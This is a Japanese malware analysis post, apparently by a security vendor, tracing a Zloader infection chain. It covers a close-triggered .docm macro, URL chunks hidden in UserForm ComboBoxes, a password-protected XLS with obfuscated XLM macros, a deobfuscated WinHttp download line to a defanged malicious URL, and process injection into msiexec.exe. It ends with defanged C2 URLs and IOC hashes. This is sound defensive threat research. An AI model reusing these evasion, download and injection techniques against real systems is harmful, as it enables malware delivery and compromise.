Zloader(別名Terdot)は、悪名高いバンキングマルウェアZeusの亜種であり、ペイロードを配信するための初期ベクトルとして「.xls」および「.xlsx」ファイルを積極的に利用することで知られています。しかしながら、最近、Zloaderファミリーが初期活動に使用している「.docm」ファイルを発見しました。これは、攻撃者がセキュリティソリューションによる検出を回避するために、Office文書を悪用する傾向があることを示しています。
初期ベクトル:
ここで感染連鎖が始まります 「.docm」 ファイルです。docmは「マクロ対応Office Word文書」の略です。以下は、ユーザーにコンテンツを有効にするよう求めるドキュメントビューです。
他の多くのドキュメントと同様に、コンテンツを有効にした後、そのアクティビティを観察しようとしましたが、何も変化がありませんでした。VBAコードを確認することで、答えが見つかりました。コンテンツを有効にしてもマクロは実行されません。ここでは、マクロの実行は「ドキュメントを閉じる」時に開始されます。
被害者がこの文書を閉じるとすぐに、 「んん」 このVBAマクロのメイン関数が呼び出されます。ここでもサブ関数が呼び出されます。ここでも攻撃者は以下のものを利用しています。 「ユーザーフォーム」 次のステージのアクティビティを実行します。
UserForm_Initialize() 関数は「Userform2」を呼び出すために使用されます。下の画像は Userform2 オブジェクトを示しています。ダイアログボックスでは、URL データがチャンク化され、25 番目のコンボボックスに重ねて表示され、実際のデータが隠されています。
userform2 のすべての ComboBox を調べた結果、第 2 段階のペイロードをダウンロードするために使用される悪意のある URL を見つけることができました。
上記の活動をまとめると、攻撃者はforループを利用してこれらすべての値にアクセスし、以下に示すように最終的なURLを作成しています。
ウイルススコア1の悪意あるサイト「hxxps[:]//feelingfit-always[.]com/11[.]php」は、パスワード保護されたXLSファイルをダウンロードするために使用されます。このファイルのパスワードは、「Userform1」内のVBAマクロに隠されています。userform1のデータを調査することで、隠されたパスワードを抽出することができました。
2nd ステージペイロード:
文書をパスワードで保護することは、アンチウイルスベンダーから身を守るための典型的な手法です。さらに深く分析するには、正しいパスワードが必要です。上記のパスワードを照合することで、ようやくExcelブックの内容を確認できます。「Sheet3」では、XLMマクロを使用してさらなるアクティビティを実行します。
ここでは、コードはドキュメント内の異なるセルに埋め込まれています。下の図は、上記のワークブックから抽出したマクロコードを示しています。
ここで攻撃者は、Excelに組み込まれているIIFやSwitchといった関数を利用してデータを難読化します。最終的に難読化されたコードは以下の通りです。
WinHttp.WinHttpRequest.5.1.open GET https[:]//santarosafuneralhome[.]com/2.php False
WinHttp.WinHttpRequest.5.1.SetRequestHeader
WinHttp.WinHttpRequest.5.1.送信
ウイルス合計スコア 8 を持つ上記の悪意のある URL は、この攻撃の第 3 段階のペイロードをダウンロードするために使用されます。
最終ペイロード分析:
DLLはZloaderの最終的なペイロードです。DLLは高度に難読化されており、Windows APIへの直接呼び出しを回避しています。ハッシュ化によってアドレスが計算され、計算された値を使用して呼び出しが行われるため、逆コンパイルは困難です。
DLL は、Windows コンポーネント インストーラーに属する正規の Microsoft プロセスであるプロセス「msiexec.exe」を一時停止モードで作成し、暗号化されたファイルをそこに挿入します。
また、悪意のある PE を復号化して実行するためのルーチンも挿入します。
スレッド コンテキストを設定すると、初期実行ポイントが渡され、最後に挿入されたコードが再開スレッドで実行されます。
このmsiexec.exeのスレッドが実行されると、次のようにCnCサーバーへの接続を試みます。
分析時にこれらの URL がダウンしていたため、さらに詳しく調べることはできませんでした。
まとめ:
このタイプの攻撃は、攻撃者が感染チェーンを開始して被害者を侵害するためのメカニズムをどのように革新するかを示しています。ユーザーは、Officeファイルを開く際に常に注意する必要があります。クイックヒールと Seqriteエンタープライズセキュリティソリューション 顧客をこのようなファイルから保護してください。エンドポイントセキュリティソリューションは常に最新の状態に保ってください。
IOC:
文書:
117fafb46f27238351f2111e8f01416412044238d2f8378a285063eb9d4eef3d
409ed829f19024045d26cc5d3a06e15a097605e13ba938875eca054a7a4a30b1
91aa050536d834947709776af40c2fde49471d28231de50df0d324cd55101df4
XLS: 52d071922413a3be8815a76118a45bf13d8d323b73ba42377591fd68c59dfc89
URL:
https[://]tiodeitidampheater.tk/post.php
https[://]actes-etatcivil.com/post.php
https[://]ankarakreatif.com/post.php
https[://]www.ramazanyildiz.net/post.php
https[://]hispaniaeng.com/post.php
https[://]www.ifdd.francophonie.org/post.php
主題専門家
アンジャリ・ラウト
プリヤンカ・シンデ
